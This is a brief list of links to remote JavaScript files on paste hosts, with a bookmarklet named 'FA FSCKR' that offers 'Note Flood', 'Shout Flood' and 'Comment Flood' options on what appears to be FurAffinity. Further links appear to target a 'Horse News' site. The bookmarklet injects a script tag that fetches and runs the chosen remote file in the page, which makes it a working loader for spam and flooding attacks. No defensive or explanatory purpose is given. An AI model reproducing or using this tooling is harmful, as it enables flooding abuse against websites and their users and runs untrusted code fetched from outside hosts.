FA
http://paste.c99.nl/9bb474cbe771d1c9fcad.js //shouts
http://paste.c99.nl/0d73553f8066bd2cbcf0.js //comments
http://a.pomf.se/yshdcr.js //notes //fix

FA FSCKR	javascript:void(eval('var%20scrpt%20="";%20var%20a=prompt("0:%20Note%20Flood,%201:%20Shout%20Flood,%202:%20Comment%20Flood","0");if(a%20==%200){scrpt="http://paste.c99.nl/b6ad3427586e35ed17e3.js";}%20else%20if(a%20==%201){scrpt="http://paste.c99.nl/9bb474cbe771d1c9fcad.js";}%20else%20if(a%20==%202){scrpt="http://paste.c99.nl/0d73553f8066bd2cbcf0.js";}scr=document.createElement("script");scr.setAttribute("src",scrpt);document.body.appendChild(scr)'));

Horse News
https://a.uguu.se/expohe.js //article submissions